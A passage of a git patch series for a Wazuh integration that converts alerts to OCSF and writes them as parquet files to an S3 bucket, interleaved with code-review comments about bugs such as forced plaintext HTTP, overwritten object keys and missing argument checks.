b/integrations/docker/amazon-security-lake.yml index a8735de543b4d..28d925f97a34e 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml 
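Review bot: The new shebang `#!/env/bin/python3` hard-codes an absolute interpreter path that presumably exists only inside the integration container (the same series mounts this script as /usr/share/logstash/bin/run.py), so running it from a checkout fails with "bad interpreter" just as the old /home/fede venv path did. The portable form is `#!/usr/bin/env python3`, with the venv put on PATH in the container image instead. The same commit also flips the transform/ package modules to mode 100755; modules that are only imported by run.py do not need the executable bit.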
@@ -89,6 +89,8 @@ services: volumes: - ../amazon-security-lake/logstash/pipeline:/usr/share/logstash/pipeline - ./certs/root-ca.pem:/usr/share/logstash/root-ca.pem + - ../amazon-security-lake/stdin_to_securitylake.py:/usr/share/logstash/bin/run.py + - ../amazon-security-lake/transform/:/usr/share/logstash/bin/transform/ #command: tail -f /dev/null command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.conf --path.settings /etc/logstash --config.reload.automatic From b9b21a83d1a6431ff8add5eb7c244a2c2a552fd9 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 27 Feb 2024 11:27:37 -0300 Subject: [PATCH 69/77] Temporary fix on ocsf class for testing purposes --- integrations/amazon-security-lake/ocsf/converter.py | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py index c927afa8fe87f..161012475cb14 100644 --- a/integrations/amazon-security-lake/ocsf/converter.py +++ b/integrations/amazon-security-lake/ocsf/converter.py @@ -27,12 +27,12 @@ def convert(event: dict) -> dict: "category_uid": 2, "class_name": "Detection Finding", "class_uid": 2004, - "count": event["_source"]["rule"]["firedtimes"], + #"count": event["_source"]["rule"]["firedtimes"], "message": event["_source"]["rule"]["description"], "finding_info": { "analytic": { "category": join(event["_source"]["rule"]["groups"]), - "name": event["_source"]["decoder"]["name"], + #"name": event["_source"]["decoder"]["name"], "type_id": 1, "uid": event["_source"]["rule"]["id"], }, @@ -50,7 +50,8 @@ def convert(event: dict) -> dict: }, "title": event["_source"]["rule"]["description"], "types": [ - event["_source"]["input"]["type"] + #event["_source"]["input"]["type"] + 0 ], "uid": event["_source"]['id'] }, From 81ecb7c57e1ed97f9437824a5468a7d4c275682d Mon Sep 17 00:00:00 2001 
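Review bot: In the two `convert` hunks the `"count"`, `"name"` and `"types"` mappings are turned into commented-out lines and `types` now hard-codes `0`, with no in-code marker that this is the temporary testing change the commit title describes, so the next reader of converter.py cannot tell the placeholder from intended behaviour. A comment on the hard-coded entry such as `0  # TODO(temporary): testing placeholder, restore event["_source"]["input"]["type"]` would carry that intent into the file, and the same marker belongs on the two commented-out keys. `convert` starts before the first hunk and ends after the second.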
From: Fede Tux Date: Tue, 27 Feb 2024 11:28:44 -0300 Subject: [PATCH 70/77] Add function to handle local s3 buckets --- .../stdin_to_securitylake.py | 30 +++++++++++++++++-- 1 file changed, 28 insertions(+), 2 deletions(-) diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index 51f1ab81cb9c6..f6931bcc51eb1 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -7,15 +7,36 @@ import time import json import datetime -from pyarrow import parquet, Table +import boto3 +from pyarrow import parquet, Table, fs from ocsf import converter block_ending = { "block_ending": True } + +def s3authenticate(profile, endpoint=None, scheme='https'): + session = boto3.session.Session(profile_name=profile) + credentials = session.get_credentials() + + if endpoint != None: + scheme='http' + + s3fs = fs.S3FileSystem( + endpoint_override=endpoint, + access_key=credentials.access_key, + secret_key=credentials.secret_key, + scheme=scheme) + + return s3fs + + + + + def encode_parquet(list,foldername,filename): try: table = Table.from_pylist(list) - parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename)) + parquet.write_table(table, '{}.parquet'.format(filename), filesystem=localS3) except Exception as e: logging.error(e) raise 
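Review bot: `if endpoint != None: scheme='http'` in `s3authenticate` silently overrides the caller's `scheme` argument for every custom endpoint, so the access key, secret and every parquet upload travel over plaintext HTTP whenever `--s3endpoint` is set, which is exactly the on-prem or non-AWS case the parameter exists for. Dropping those two lines (and using `is not None` where a check is still wanted) lets a caller pass `scheme='http'` explicitly for a local test bucket while an HTTPS endpoint keeps TLS; `credentials.token` is also never forwarded, so a profile that yields temporary credentials would be rejected, and `fs.S3FileSystem` accepts it as `session_token=credentials.token`. Separately, `encode_parquet` now writes with `filesystem=localS3`, a name defined nowhere in this hunk, so unless it is bound outside the hunk the first flush raises `NameError`; `foldername` is left as an unused parameter.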
@@ -41,11 +62,13 @@ def get_elapsedseconds(reference_timestamp): date = datetime.datetime.now(datetime.timezone.utc).strftime('%F_%H.%M.%S') parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') + parser.add_argument('-e','--s3endpoint', type=str, action='store', default=None, help='Hostname and port of the S3 destination (defaults to AWS\')') parser.add_argument('-i','--pushinterval', type=int, action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') parser.add_argument('-l','--logoutput', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') parser.add_argument('-m','--maxlength', type=int, action='store', default=2000, help='Event number threshold for submission to Security Lake') parser.add_argument('-n','--linebuffer', type=int, action='store', default=100, help='stdin line buffer length') parser.add_argument('-o','--outputfolder', type=str, action='store', help='Folder or S3 bucket URL to dump parquet files to') + parser.add_argument('-p','--s3profile', type=str, action='store', default='default', help='AWS profile as stored in credentials file') parser.add_argument('-s','--sleeptime', type=int, action='store', default=5, help='Input buffer polling interval') args = parser.parse_args() #logging.basicConfig(format='%(asctime)s %(message)s', filename=args.logoutput, encoding='utf-8', level=logging.DEBUG) @@ -74,6 +97,7 @@ def get_elapsedseconds(reference_timestamp): if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: logging.info('Writing data to parquet file') + s3fs = s3authenticate(args.s3profile,args.s3endpoint) encode_parquet(output_buffer,args.outputfolder,'wazuh-{}'.format(date)) starttimestamp = datetime.datetime.now(datetime.timezone.utc) output_buffer = [] 
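Review bot: `s3fs = s3authenticate(args.s3profile,args.s3endpoint)` runs inside the flush branch of the second hunk, so every push re-reads the credentials file and builds a fresh boto session and `S3FileSystem`, and the result is then never handed to `encode_parquet`, which still writes with `filesystem=localS3`. Authenticating once before `while True:` and passing `s3fs` into `encode_parquet` removes the per-flush session churn; the enclosing `if __name__ == "__main__"` block starts before the first hunk. In the first hunk the `--s3endpoint` help text says "Hostname and port", but the value goes verbatim into `endpoint_override`, so stating that no scheme prefix is expected, e.g. `help='Hostname and port of the S3 destination, without scheme (defaults to AWS)'`, would prevent a misconfiguration.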
@@ -88,3 +112,5 @@ def get_elapsedseconds(reference_timestamp): logging.error("Error running script") logging.error(e) raise + + From f4a733615d05e104168458dc4c588c08862269e2 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 27 Feb 2024 14:07:57 -0300 Subject: [PATCH 71/77] Allow to set the bucket name from the cli --- .../pipeline/indexer-to-integrator.conf | 19 ++++++++++--------- .../stdin_to_securitylake.py | 12 ++++-------- 2 files changed, 14 insertions(+), 17 deletions(-) diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf index 50e3ec8300674..072022f6d076a 100644 --- a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf +++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf @@ -29,15 +29,16 @@ output { # codec => rubydebug #} - #pipe - #{ - # id => "securityLake" - # command => "/usr/share/logstash/bin/run.py --pushinterval 300 --maxlength 2000 --linebuffer 100 --sleeptime 1 --outputfolder s3://" - #} - - file { - id => "fileOutputPipeline" - path => "/tmp/indexer-to-file.json" + pipe + { + id => "securityLake" + #command => "/usr/share/logstash/bin/run.py --pushinterval 300 --maxlength 2000 --linebuffer 100 --sleeptime 1 --outputfolder s3://s3.ninja:9000/securitylake" + command => "/usr/share/logstash/bin/run.py --pushinterval 300 --maxlength 2000 --linebuffer 100 --sleeptime 1 --bucketname securitylake --s3endpoint s3.ninja:9000 --s3profile default" } + #file { + # id => "fileOutputPipeline" + # path => "/tmp/indexer-to-file.json" + #} + } diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index f6931bcc51eb1..c1c2c5d7118e0 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py 
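Review bot: The enabled `pipe` output hardcodes a test S3 target and profile in the committed pipeline (`--bucketname securitylake --s3endpoint s3.ninja:9000 --s3profile default`), and since the mounted script forces `scheme='http'` whenever an endpoint is given, every alert leaves logstash over plaintext HTTP using the `default` profile's keys. The `pipe-output.conf` deleted later in this series already read its secrets from `${WAZUH_INDEXER_USERNAME}`-style environment variables; the bucket, endpoint and profile belong in the same kind of variables rather than in the config, e.g. `command => "/usr/share/logstash/bin/run.py ... --bucketname ${SL_BUCKET} --s3endpoint ${SL_ENDPOINT} --s3profile ${SL_PROFILE}"` (placeholder variable names). The previous `file` output is kept as commented-out lines rather than removed, alongside the already commented-out `command`.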
@@ -28,15 +28,11 @@ def s3authenticate(profile, endpoint=None, scheme='https'): scheme=scheme) return s3fs - - - - -def encode_parquet(list,foldername,filename): +def encode_parquet(list,bucketname,filename,filesystem): try: table = Table.from_pylist(list) - parquet.write_table(table, '{}.parquet'.format(filename), filesystem=localS3) + parquet.write_table(table, '{}/{}.parquet'.format(bucketname,filename), filesystem=filesystem) except Exception as e: logging.error(e) raise 
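Review bot: The first parameter of `encode_parquet` is still named `list`, shadowing the builtin for the whole body, and the new signature adds `filesystem` without any docstring saying it must be a pyarrow filesystem. Renaming it, `def encode_parquet(events, bucketname, filename, filesystem):` and `table = Table.from_pylist(events)`, plus a one-line docstring such as `"""Write the OCSF event dicts as <bucketname>/<filename>.parquet through the given pyarrow filesystem."""`, reads cleanly. In the `except` block, `logging.error(e)` followed by `raise` records only the message; `logging.exception('Failed to write parquet file')` keeps the traceback and the re-raise.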
@@ -62,12 +58,12 @@ def get_elapsedseconds(reference_timestamp): date = datetime.datetime.now(datetime.timezone.utc).strftime('%F_%H.%M.%S') parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') + parser.add_argument('-b','--bucketname', type=str, action='store', help='S3 bucket name to write parquet files to') parser.add_argument('-e','--s3endpoint', type=str, action='store', default=None, help='Hostname and port of the S3 destination (defaults to AWS\')') parser.add_argument('-i','--pushinterval', type=int, action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') parser.add_argument('-l','--logoutput', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') parser.add_argument('-m','--maxlength', type=int, action='store', default=2000, help='Event number threshold for submission to Security Lake') parser.add_argument('-n','--linebuffer', type=int, action='store', default=100, help='stdin line buffer length') - parser.add_argument('-o','--outputfolder', type=str, action='store', help='Folder or S3 bucket URL to dump parquet files to') parser.add_argument('-p','--s3profile', type=str, action='store', default='default', help='AWS profile as stored in credentials file') parser.add_argument('-s','--sleeptime', type=int, action='store', default=5, help='Input buffer polling interval') args = parser.parse_args() 
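Review bot: `--bucketname` is added with neither a default nor `required=True`, so when it is omitted `args.bucketname` is `None` and the object key built in `encode_parquet` becomes `None/wazuh-<date>.parquet` instead of the parser rejecting the invocation. `parser.add_argument('-b','--bucketname', type=str, action='store', required=True, help='S3 bucket name to write parquet files to')` makes the missing value an argparse error at startup. The enclosing `if __name__ == "__main__"` block continues outside the hunk.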
@@ -98,7 +94,7 @@ def get_elapsedseconds(reference_timestamp): if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: logging.info('Writing data to parquet file') s3fs = s3authenticate(args.s3profile,args.s3endpoint) - encode_parquet(output_buffer,args.outputfolder,'wazuh-{}'.format(date)) + encode_parquet(output_buffer,args.bucketname,'wazuh-{}'.format(date),s3fs) starttimestamp = datetime.datetime.now(datetime.timezone.utc) output_buffer = [] From 811f94030578b2c90f095020f11314c77a4174d2 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Wed, 28 Feb 2024 08:32:11 -0300 Subject: [PATCH 72/77] Renamed script to match convention --- integrations/amazon-security-lake/run.py | 136 +++++++++++++++--- .../stdin_to_securitylake.py | 112 --------------- 2 files changed, 117 insertions(+), 131 deletions(-) mode change 100644 => 100755 integrations/amazon-security-lake/run.py delete mode 100755 integrations/amazon-security-lake/stdin_to_securitylake.py diff --git a/integrations/amazon-security-lake/run.py b/integrations/amazon-security-lake/run.py old mode 100644 new mode 100755 index c26adffa2ea0f..94afd33959918 --- a/integrations/amazon-security-lake/run.py +++ b/integrations/amazon-security-lake/run.py 
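Review bot: `date` is computed once at startup (visible at the top of the previous hunk), so every flush writes to the same `wazuh-{date}` key and each `encode_parquet` call overwrites the previous object in the bucket; only the last interval of alerts survives. Taking the timestamp inside the flush fixes it: `encode_parquet(output_buffer,args.bucketname,'wazuh-{}'.format(datetime.datetime.now(datetime.timezone.utc).strftime('%F_%H.%M.%S')),s3fs)`. The enclosing loop and `__main__` block extend beyond the hunk.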
@@ -1,26 +1,124 @@ -#!/env/bin/python3.9 +#!/env/bin/python3 -import transform +# vim: bkc=yes bk wb + +import os +import sys +import argparse +import logging +import time import json +import datetime +import boto3 +from pyarrow import parquet, Table, fs +from ocsf import converter + +block_ending = { "block_ending": True } + +def check_fd_open(file): + return file.closed + +def s3authenticate(profile, endpoint=None, scheme='https'): + session = boto3.session.Session(profile_name=profile) + credentials = session.get_credentials() + + if endpoint != None: + scheme='http' + + s3fs = fs.S3FileSystem( + endpoint_override=endpoint, + access_key=credentials.access_key, + secret_key=credentials.secret_key, + scheme=scheme) + + return s3fs + +def encode_parquet(list,bucketname,filename,filesystem): + try: + table = Table.from_pylist(list) + parquet.write_table(table, '{}/{}'.format(bucketname,filename), filesystem=filesystem) + except Exception as e: + logging.error(e) + raise + +def map_block(fileobject, length): + output=[] + ocsf_mapped_alert = {} + for line in range(0, length): + line = fileobject.readline() + if line == '': + output.append(block_ending) + break + alert = json.loads(line) + ocsf_mapped_alert = converter.convert(alert) + output.append(ocsf_mapped_alert) + return output + +def timedelta(reference_timestamp): + current_time = datetime.datetime.now(datetime.timezone.utc) + return (current_time - reference_timestamp).total_seconds() + +def utctime(): + return datetime.datetime.now(datetime.timezone.utc) + +if __name__ == "__main__": + + parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') + parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') + parser.add_argument('-b','--bucketname', type=str, action='store', help='S3 bucket name to write parquet files to') + parser.add_argument('-e','--s3endpoint', type=str, action='store', default=None, help='Hostname and port of the S3 destination (defaults to 
AWS\')') + parser.add_argument('-i','--pushinterval', type=int, action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') + parser.add_argument('-l','--logoutput', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') + parser.add_argument('-m','--maxlength', type=int, action='store', default=2000, help='Event number threshold for submission to Security Lake') + parser.add_argument('-n','--linebuffer', type=int, action='store', default=100, help='stdin line buffer length') + parser.add_argument('-p','--s3profile', type=str, action='store', default='default', help='AWS profile as stored in credentials file') + parser.add_argument('-s','--sleeptime', type=int, action='store', default=5, help='Input buffer polling interval') + args = parser.parse_args() + + logging.basicConfig(format='%(asctime)s %(message)s', encoding='utf-8', level=logging.DEBUG) + logging.info('BUFFERING STDIN') + + try: + + with os.fdopen(sys.stdin.fileno(), 'rt') as stdin: + output_buffer = [] + loop_start_time = utctime() + + try: + s3fs = s3authenticate(args.s3profile,args.s3endpoint) + while True: + + current_block = map_block( stdin, args.linebuffer ) + + if current_block[-1] == block_ending: + output_buffer += current_block[0:-1] + time.sleep(args.sleeptime) + else: + output_buffer += current_block + + buffer_length = len(output_buffer) + + if buffer_length == 0: + continue + elapsed_seconds = timedelta(loop_start_time) -def _test(): - ocsf_event = {} - with open("./wazuh-event.sample.json", "r") as fd: - # Load from file descriptor - raw_event = json.load(fd) - try: - event = transform.converter.from_json(raw_event) - print(event) - ocsf_event = transform.converter.to_detection_finding(event) - print("") - print("--") - print("") - print(ocsf_event) + if buffer_length > args.maxlength or elapsed_seconds > args.pushinterval: + logging.info('Elapsed seconds: {}'.format(elapsed_seconds)) + loop_start_time = 
utctime() + timestamp = loop_start_time.strftime('%F_%H.%M.%S') + filename='wazuh-{}.parquet'.format(timestamp) + logging.info('Writing data to s3://{}/{}'.format(args.bucketname,filename)) + encode_parquet(output_buffer,args.bucketname,filename,s3fs) + output_buffer = [] - except KeyError as e: - raise (e) + except KeyboardInterrupt: + logging.info("Keyboard Interrupt issued") + exit(0) + logging.info('FINISHED RETRIEVING STDIN') -if __name__ == '__main__': - _test() + except Exception as e: + logging.error("Error running script") + logging.error(e) + raise diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py deleted file mode 100755 index c1c2c5d7118e0..0000000000000 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ /dev/null 
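Review bot: `map_block` calls `json.loads(line)` and `converter.convert(alert)` with no per-line handling, so a single malformed line from logstash, or an event missing one of the nested keys the converter indexes, raises out of `while True:` to the outer `except Exception`, which logs and re-raises and terminates the pipeline for every subsequent alert. Catching the decode and lookup errors per line, logging them and continuing keeps one bad event from stopping ingestion; the rewritten function is below. Also in this hunk, `--debug` and `--logoutput` are parsed but never used (logging is configured at `DEBUG` unconditionally), `check_fd_open` returns `file.closed` while its name suggests the opposite and has no caller, the loop variable `line` in `map_block` is reused for the index and the text, and `exit(0)` inside the `with` block should be `sys.exit(0)`.
```python
def map_block(fileobject, length):
    """Read up to `length` lines and convert each JSON alert to OCSF.

    The returned list ends with `block_ending` when the input hit EOF so the
    caller can throttle; lines that are not valid JSON or lack the fields the
    converter indexes are logged and skipped rather than stopping the loop.
    """
    output = []
    for _ in range(0, length):
        line = fileobject.readline()
        if line == '':
            output.append(block_ending)
            break
        try:
            alert = json.loads(line)
            output.append(converter.convert(alert))
        except (json.JSONDecodeError, KeyError, TypeError) as e:
            logging.warning('Skipping event that could not be mapped: %s', e)
    return output
# … unchanged: s3authenticate, encode_parquet, timedelta, utctime, __main__ …
```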
@@ -1,112 +0,0 @@ -#!/env/bin/python3 - -import os -import sys -import argparse -import logging -import time -import json -import datetime -import boto3 -from pyarrow import parquet, Table, fs -from ocsf import converter - -block_ending = { "block_ending": True } - - -def s3authenticate(profile, endpoint=None, scheme='https'): - session = boto3.session.Session(profile_name=profile) - credentials = session.get_credentials() - - if endpoint != None: - scheme='http' - - s3fs = fs.S3FileSystem( - endpoint_override=endpoint, - access_key=credentials.access_key, - secret_key=credentials.secret_key, - scheme=scheme) - - return s3fs - -def encode_parquet(list,bucketname,filename,filesystem): - try: - table = Table.from_pylist(list) - parquet.write_table(table, '{}/{}.parquet'.format(bucketname,filename), filesystem=filesystem) - except Exception as e: - logging.error(e) - raise - -def map_block(fileobject, length): - output=[] - ocsf_mapped_alert = {} - for line in range(0, length): - line = fileobject.readline() - if line == '': - output.append(block_ending) - break - alert = json.loads(line) - ocsf_mapped_alert = converter.convert(alert) - output.append(ocsf_mapped_alert) - return output - -def get_elapsedseconds(reference_timestamp): - current_time = datetime.datetime.now(datetime.timezone.utc) - return (current_time - reference_timestamp).total_seconds() - -if __name__ == "__main__": - date = datetime.datetime.now(datetime.timezone.utc).strftime('%F_%H.%M.%S') - parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') - parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') - parser.add_argument('-b','--bucketname', type=str, action='store', help='S3 bucket name to write parquet files to') - parser.add_argument('-e','--s3endpoint', type=str, action='store', default=None, help='Hostname and port of the S3 destination (defaults to AWS\')') - parser.add_argument('-i','--pushinterval', type=int, action='store', 
default=299, help='Time interval in seconds for pushing data to Security Lake') - parser.add_argument('-l','--logoutput', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') - parser.add_argument('-m','--maxlength', type=int, action='store', default=2000, help='Event number threshold for submission to Security Lake') - parser.add_argument('-n','--linebuffer', type=int, action='store', default=100, help='stdin line buffer length') - parser.add_argument('-p','--s3profile', type=str, action='store', default='default', help='AWS profile as stored in credentials file') - parser.add_argument('-s','--sleeptime', type=int, action='store', default=5, help='Input buffer polling interval') - args = parser.parse_args() - #logging.basicConfig(format='%(asctime)s %(message)s', filename=args.logoutput, encoding='utf-8', level=logging.DEBUG) - logging.basicConfig(format='%(asctime)s %(message)s', encoding='utf-8', level=logging.DEBUG) - logging.info('BUFFERING STDIN') - - try: - - with os.fdopen(sys.stdin.fileno(), 'rt') as stdin: - output_buffer = [] - starttimestamp = datetime.datetime.now(datetime.timezone.utc) - - try: - while True: - - current_block = map_block( stdin, args.linebuffer ) - - if current_block[-1] == block_ending: - output_buffer += current_block[0:-1] - time.sleep(args.sleeptime) - else: - output_buffer += current_block - - if len(output_buffer) == 0: - continue - - if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: - logging.info('Writing data to parquet file') - s3fs = s3authenticate(args.s3profile,args.s3endpoint) - encode_parquet(output_buffer,args.bucketname,'wazuh-{}'.format(date),s3fs) - starttimestamp = datetime.datetime.now(datetime.timezone.utc) - output_buffer = [] - - except KeyboardInterrupt: - logging.info("Keyboard Interrupt issued") - exit(0) - - logging.info('FINISHED RETRIEVING STDIN') - - except Exception as e: - logging.error("Error running 
script") - logging.error(e) - raise - - From c421235037a5982ff9387bd42e2ad9f1a2321815 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Wed, 28 Feb 2024 09:12:05 -0300 Subject: [PATCH 73/77] Move argparse into its own function --- integrations/amazon-security-lake/run.py | 42 +++++++++++++----------- 1 file changed, 23 insertions(+), 19 deletions(-) diff --git a/integrations/amazon-security-lake/run.py b/integrations/amazon-security-lake/run.py index 94afd33959918..24c236f625497 100755 --- a/integrations/amazon-security-lake/run.py +++ b/integrations/amazon-security-lake/run.py 
@@ -13,7 +13,25 @@ from pyarrow import parquet, Table, fs from ocsf import converter -block_ending = { "block_ending": True } + +logging.basicConfig(format='%(asctime)s %(message)s', encoding='utf-8', level=logging.DEBUG) + +BLOCK_ENDING = { "block_ending": True } + + + +def create_arg_parser(): + parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') + parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') + parser.add_argument('-b','--bucketname', type=str, action='store', help='S3 bucket name to write parquet files to') + parser.add_argument('-e','--s3endpoint', type=str, action='store', default=None, help='Hostname and port of the S3 destination (defaults to AWS\')') + parser.add_argument('-i','--pushinterval', type=int, action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') + parser.add_argument('-l','--logoutput', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') + parser.add_argument('-m','--maxlength', type=int, action='store', default=2000, help='Event number threshold for submission to Security Lake') + parser.add_argument('-n','--linebuffer', type=int, action='store', default=100, help='stdin line buffer length') + parser.add_argument('-p','--s3profile', type=str, action='store', default='default', help='AWS profile as stored in credentials file') + parser.add_argument('-s','--sleeptime', type=int, action='store', default=5, help='Input buffer polling interval') + return parser def check_fd_open(file): return file.closed @@ -47,7 +65,7 @@ def map_block(fileobject, length): for line in range(0, length): line = fileobject.readline() if line == '': - output.append(block_ending) + output.append(BLOCK_ENDING) break alert = json.loads(line) ocsf_mapped_alert = converter.convert(alert) 
@@ -62,23 +80,9 @@ def utctime(): return datetime.datetime.now(datetime.timezone.utc) if __name__ == "__main__": - - parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') - parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') - parser.add_argument('-b','--bucketname', type=str, action='store', help='S3 bucket name to write parquet files to') - parser.add_argument('-e','--s3endpoint', type=str, action='store', default=None, help='Hostname and port of the S3 destination (defaults to AWS\')') - parser.add_argument('-i','--pushinterval', type=int, action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') - parser.add_argument('-l','--logoutput', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') - parser.add_argument('-m','--maxlength', type=int, action='store', default=2000, help='Event number threshold for submission to Security Lake') - parser.add_argument('-n','--linebuffer', type=int, action='store', default=100, help='stdin line buffer length') - parser.add_argument('-p','--s3profile', type=str, action='store', default='default', help='AWS profile as stored in credentials file') - parser.add_argument('-s','--sleeptime', type=int, action='store', default=5, help='Input buffer polling interval') - args = parser.parse_args() - - logging.basicConfig(format='%(asctime)s %(message)s', encoding='utf-8', level=logging.DEBUG) - logging.info('BUFFERING STDIN') - try: + args = create_arg_parser().parse_args() + logging.info('BUFFERING STDIN') with os.fdopen(sys.stdin.fileno(), 'rt') as stdin: output_buffer = [] @@ -90,7 +94,7 @@ def utctime(): current_block = map_block( stdin, args.linebuffer ) - if current_block[-1] == block_ending: + if current_block[-1] == BLOCK_ENDING: output_buffer += current_block[0:-1] time.sleep(args.sleeptime) else: From 3713fb174eb1167033f2c9799d4885b327afbbd5 Mon Sep 17 00:00:00 2001 
From: Fede Tux Date: Wed, 28 Feb 2024 09:13:34 -0300 Subject: [PATCH 74/77] Add volumes to mount script and dependencies in compose file --- integrations/docker/amazon-security-lake.yml | 15 +++++++++++++-- 1 file changed, 13 insertions(+), 2 deletions(-) diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml index 28d925f97a34e..db142f151aeef 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -10,7 +10,7 @@ services: depends_on: wazuh.indexer: condition: service_healthy - command: bash -c "python run.py -a wazuh.indexer" + command: bash -c "python run.py -a wazuh.indexer -t1" wazuh.indexer: image: opensearchproject/opensearch:2.11.1 @@ -89,11 +89,22 @@ services: volumes: - ../amazon-security-lake/logstash/pipeline:/usr/share/logstash/pipeline - ./certs/root-ca.pem:/usr/share/logstash/root-ca.pem - - ../amazon-security-lake/stdin_to_securitylake.py:/usr/share/logstash/bin/run.py + - ../amazon-security-lake/run.py:/usr/share/logstash/bin/run.py - ../amazon-security-lake/transform/:/usr/share/logstash/bin/transform/ + - ../amazon-security-lake/ocsf/:/usr/share/logstash/bin/ocsf/ + - ./credentials:/usr/share/logstash/.aws/credentials #command: tail -f /dev/null command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.conf --path.settings /etc/logstash --config.reload.automatic + #s3.ninja: + # image: scireum/s3-ninja:latest + # container_name: s3.ninja + # hostname: s3.ninja + # ports: + # - "9444:9000" + # volumes: + # - ./s3-data:/home/sirius/data + wazuh-certs-generator: image: wazuh/wazuh-certs-generator:0.0.1 hostname: wazuh-certs-generator From f6329f4e44073277fc4048584685f4b74bc70336 Mon Sep 17 00:00:00 2001 From: Federico Gustavo Galland <99492720+f-galland@users.noreply.github.com> Date: Wed, 28 Feb 2024 09:17:12 -0300 Subject: [PATCH 75/77] Delete integrations/ocsf-mapping.json 
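Review bot: `./credentials:/usr/share/logstash/.aws/credentials` mounts a static AWS credentials file read-write into the logstash container; adding `:ro` (`- ./credentials:/usr/share/logstash/.aws/credentials:ro`) stops the container from altering it, and since anything running in that container can read the file, the keys it holds should be limited to a put-only policy on the Security Lake bucket. The commented-out `s3.ninja` service is left as dead config; if it is meant as a local test target, a short comment saying so would explain why it stays. The `-t1` appended to the generator command in the first hunk is not explained by the commit message, so its meaning is not inferable from this page.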
Signed-off-by: Federico Gustavo Galland <99492720+f-galland@users.noreply.github.com> --- integrations/ocsf-mapping.json | 86 ---------------------------------- 1 file changed, 86 deletions(-) delete mode 100644 integrations/ocsf-mapping.json diff --git a/integrations/ocsf-mapping.json b/integrations/ocsf-mapping.json deleted file mode 100644 index c1238dac285df..0000000000000 --- a/integrations/ocsf-mapping.json +++ /dev/null 
@@ -1,86 +0,0 @@ -{ - "1.0.0": - { - "constants": - { - "activity_id" : 1, - "analytic.type" : "Rule", - "analytic.type_id" : 1, - "attacks.version" : "v13.1", - "category_name" : "Findings", - "category_uid" : 2, - "class_name" : "Security Finding", - "class_uid" : 2001, - "metadata.log_name" : "Security events", - "metadata.log_provider" : "Wazuh", - "metadata.product.lang" : "en", - "metadata.product.name" : "Wazuh", - "metadata.product.vendor_name" : "Wazuh, Inc.", - "metadata.product.version" : "4.9.0", - "status_id" : 99, - "type_uid" : 200101 - }, - "mappings": - { - "analytic.category" : "rule.groups", - "analytic.name" : "decoder.name", - "analytic.uid" : "rule.id", - "attacks.tactics" : "rule.mitre.tactic", - "attacks.technique" : "rule.mitre.technique", - "count" : "rule.firedtimes", - "data_sources" : ["_index", "location", "manager.name"], - "finding.title" : "rule.description", - "finding.types" : "input.type", - "finding.uid" : "id", - "message" : "rule.description", - "nist" : "rule.nist_800_53", - "raw_data" : "full_log", - "resources.name" : "agent.name", - "resources.uid" : "agent.id", - "risk_score" : "rule.level", - "severity_id" : "rule.level", - "time" : "timestamp" - } - }, - "1.1.0": - { - "constants": - { - "activity_id" : 1, - "category_name" : "Findings", - "category_uid" : 2, - "class_name" : "Security Finding", - "class_uid" : 2001, - "finding_info.analytic.type" : "Rule", - "finding_info.analytic.type_id" : 1, - "finding_info.attacks.version" : "v13.1", - "metadata.log_name" : "Security events", - "metadata.log_provider" : "Wazuh", - "metadata.product.lang" : "en", - "metadata.product.name" : "Wazuh", - "metadata.product.vendor_name" : "Wazuh, Inc.", - "metadata.product.version" : "4.9.0", - 